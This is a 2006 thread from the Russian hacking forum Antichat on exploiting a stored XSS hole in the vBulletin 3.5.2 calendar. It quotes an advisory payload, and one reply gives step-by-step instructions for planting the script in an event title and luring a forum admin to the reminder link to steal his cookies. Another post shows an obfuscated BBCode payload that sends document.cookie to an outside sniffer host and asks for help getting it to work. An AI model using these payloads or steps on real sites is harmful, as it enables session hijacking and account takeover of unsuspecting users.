ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Как использовать эту уязвимость в vBulletin 3.5.2?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как использовать эту уязвимость в vBulletin 3.5.2?
  #1  
Старый 19.01.2006, 16:15
Аватар для ProblemaT
ProblemaT
Познающий
Регистрация: 16.12.2005
Сообщений: 42
Провел на форуме:
173841

Репутация: -4
По умолчанию Как использовать эту уязвимость в vBulletin 3.5.2?
Если не трудно объясните куда её внедрить... эту xss, в клендарь... но куда именно

Vulnerability:
--------------------
Html_Injection :
The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.php AS include'. that may allow a remote user to inject HTML/javascript codes to events of calendar. The hostile code may be rendered in the web browser of the victim user who will Request Reminder for those Events (persistent).
For example an attacker creates new event (Single-All Day Event , Ranged Event OR Recurring Event)with this content:

TITLE:--------->Test<script>alert(document.cookie)</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter

The hostile code will be rendered in the web browser of the victim user who will Request Reminder for this Event via http://example.com/vbulletin/calenda...addreminder&e=[eventid]
The hostile code will originate from the site running the Vbulletin software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies),or take actions on the site acting as the target user.

http://www.securitylab.ru/vulnerabil...rce/243694.php

Читаю читаю не могу понять(с английским у меня трудновато)...
 
Ответить с цитированием

Весьма просто!
  #2  
Старый 20.01.2006, 00:43
Аватар для F_taker
F_taker
Новичок
Регистрация: 18.01.2006
Сообщений: 23
Провел на форуме:
49223

Репутация: 1
По умолчанию Весьма просто!
Кстати первая уязвимость, которую я использовал)
Знач суть такова, что в заголовке не фильтруется текст на javascript.
Создаешь в календаре событие(желательно на сл.год ) с заголовком, содержащем XSS.
Создал? смотри ссылку в браузере - там после &е= будет число.
Далее подставляешь - http://example.com/vbulletin/calenda...addreminder&e=[тут число]
впариваешь эту ссылку админу и будет тебе счастье.
 
Ответить с цитированием

  #3  
Старый 20.01.2006, 01:44
Аватар для milord69
milord69
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564

Репутация: 0
По умолчанию
Эта уязвимость работает на 3.5.0 версии?
 
Ответить с цитированием

  #4  
Старый 21.01.2006, 14:07
Аватар для F_taker
F_taker
Новичок
Регистрация: 18.01.2006
Сообщений: 23
Провел на форуме:
49223

Репутация: 1
По умолчанию
должна работать. В исходнике написано что и ранние версии тоже могут быть уязвимы.
 
Ответить с цитированием

  #5  
Старый 22.01.2006, 16:24
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
Question
Ребята вы мне подскажите что я тут не так сделал?



Код HTML:
[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ]
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip	t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)`
Алерт есть, и этот сплойт не палится но на сниффе ничего
Последний раз редактировалось Electro; 22.01.2006 в 16:28.. Причина: забыл про тег
 
Ответить с цитированием

  #6  
Старый 22.01.2006, 16:43
Аватар для Barsik
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790

Репутация: 726
Отправить сообщение для Barsik с помощью ICQ Отправить сообщение для Barsik с помощью MSN
По умолчанию
Ты через Оперу может сидишь? Если да то попробуй через Ie
 
Ответить с цитированием

  #7  
Старый 22.01.2006, 16:55
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
Цитата:
Сообщение от Barsik  
Ты через Оперу может сидишь? Если да то попробуй через Ie
Неа я под ИЕ
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Html_Injection in vBulletin 3.5.2 max_pain89 Форумы 16 08.01.2006 17:23
XSS в vBulletin 3.5.2 scorpion Комментарии к видео 0 06.01.2006 04:14
Уязвимость в vBulletin 3.5.0 Имба Форумы 0 20.11.2005 03:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ